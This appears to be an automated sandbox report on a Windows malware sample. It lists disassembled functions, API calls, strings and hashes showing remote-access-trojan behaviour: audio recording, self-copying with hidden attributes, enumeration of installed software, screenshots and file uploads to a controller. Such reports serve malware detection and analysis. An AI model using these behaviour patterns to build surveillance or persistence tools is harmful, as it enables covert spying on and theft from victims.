                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                        • String ID: .exe$8SG$WDH$exepath$open$temp_
                        • API String ID: 2649220323-436679193
                        • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                        • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                        • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                        • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                        Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                        • SetEvent.KERNEL32 ref: 0041B219
                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                        • CloseHandle.KERNEL32 ref: 0041B23A
                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                        • API String ID: 738084811-2094122233
                        • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                        • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                        • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                        • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                        Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Write$Create
                        • String ID: RIFF$WAVE$data$fmt
                        • API String ID: 1602526932-4212202414
                        • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                        • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                        • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                        • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                        Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000001,0040764D,C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                        • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                        • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                        • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                        • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                        • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                        • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: C:\Users\user\AppData\Roaming\jdSldfVS.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                        • API String ID: 1646373207-2239704826
                        • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                        • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                        • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                        • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                        Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 0040CE07
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                        • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                        • _wcslen.LIBCMT ref: 0040CEE6
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                        • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000000,00000000), ref: 0040CF84
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                        • _wcslen.LIBCMT ref: 0040CFC6
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                        • ExitProcess.KERNEL32 ref: 0040D062
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                        • String ID: 6$C:\Users\user\AppData\Roaming\jdSldfVS.exe$del$open
                        • API String ID: 1579085052-811573952
                        • Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                        • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                        • Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                        • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                        Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(?), ref: 0041C036
                        • _memcmp.LIBVCRUNTIME ref: 0041C04E
                        • lstrlenW.KERNEL32(?), ref: 0041C067
                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                        • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                        • _wcslen.LIBCMT ref: 0041C13B
                        • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                        • GetLastError.KERNEL32 ref: 0041C173
                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                        • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                        • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                        • GetLastError.KERNEL32 ref: 0041C1D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                        • String ID: ?
                        • API String ID: 3941738427-1684325040
                        • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                        • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                        • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                        • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                        Function 00414D86 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                        • LoadLibraryA.KERNEL32(?), ref: 00414E17
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                        • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                        • LoadLibraryA.KERNEL32(?), ref: 00414E76
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                        • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                        • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                        • String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                        • API String ID: 2490988753-1941338355
                        • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                        • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                        • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                        • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                        Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$EnvironmentVariable$_wcschr
                        • String ID:
                        • API String ID: 3899193279-0
                        • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                        • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                        • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                        • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                        Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                        • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                        • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                        • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                        • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                        • Sleep.KERNEL32(00000064), ref: 00412E94
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                        • String ID: /stext "$0TG$0TG$NG$NG
                        • API String ID: 1223786279-2576077980
                        • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                        • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                        • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                        • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                        Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                        • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnumOpen
                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                        • API String ID: 1332880857-3714951968
                        • Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                        • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                        • Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                        • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                        Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                        Download Yara Rule
                        APIs
                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                        • GetCursorPos.USER32(?), ref: 0041D5E9
                        • SetForegroundWindow.USER32(?), ref: 0041D5F2
                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                        • ExitProcess.KERNEL32 ref: 0041D665
                        • CreatePopupMenu.USER32 ref: 0041D66B
                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                        • String ID: Close
                        • API String ID: 1657328048-3535843008
                        • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                        • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                        • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                        • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                        Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$Info
                        • String ID:
                        • API String ID: 2509303402-0
                        • Opcode ID: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                        • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                        • Opcode Fuzzy Hash: 5c7b1bf4f475568e38e69d940d0222fa4f9c7dd3754b5f784b0771feacd0cc66
                        • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                        Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                        • __aulldiv.LIBCMT ref: 00408D4D
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                        • CloseHandle.KERNEL32(00000000), ref: 00408F64
                        • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                        • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                        • API String ID: 3086580692-2582957567
                        • Opcode ID: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                        • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                        • Opcode Fuzzy Hash: 63a76c325e571f1cbcae1b5be894793c9b49cb204c16b04160e7bd094f2be9c7
                        • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                        Function 0040A726 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00001388), ref: 0040A740
                          • Part of subcall function 0040A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                          • Part of subcall function 0040A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                          • Part of subcall function 0040A675: Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                          • Part of subcall function 0040A675: CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A77C
                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A78D
                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7A4
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                        • API String ID: 3795512280-1152054767
                        • Opcode ID: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                        • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                        • Opcode Fuzzy Hash: f9bf0f70ca639f6d962135a3ade2805c3c6b71e3802994e37fdf4666e5df7246
                        • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                        Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                        Download Yara Rule
                        APIs
                        • connect.WS2_32(?,?,?), ref: 004048E0
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                        • WSAGetLastError.WS2_32 ref: 00404A21
                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                        • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                        • API String ID: 994465650-3229884001
                        • Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                        • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                        • Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
                        • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                        Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___free_lconv_mon.LIBCMT ref: 0045130A
                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                        • _free.LIBCMT ref: 004512FF
                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                        • _free.LIBCMT ref: 00451321
                        • _free.LIBCMT ref: 00451336
                        • _free.LIBCMT ref: 00451341
                        • _free.LIBCMT ref: 00451363
                        • _free.LIBCMT ref: 00451376
                        • _free.LIBCMT ref: 00451384
                        • _free.LIBCMT ref: 0045138F
                        • _free.LIBCMT ref: 004513C7
                        • _free.LIBCMT ref: 004513CE
                        • _free.LIBCMT ref: 004513EB
                        • _free.LIBCMT ref: 00451403
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                        • String ID:
                        • API String ID: 161543041-0
                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                        • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                        • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                        Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 00419FB9
                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                        • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                        • GetLocalTime.KERNEL32(?), ref: 0041A105
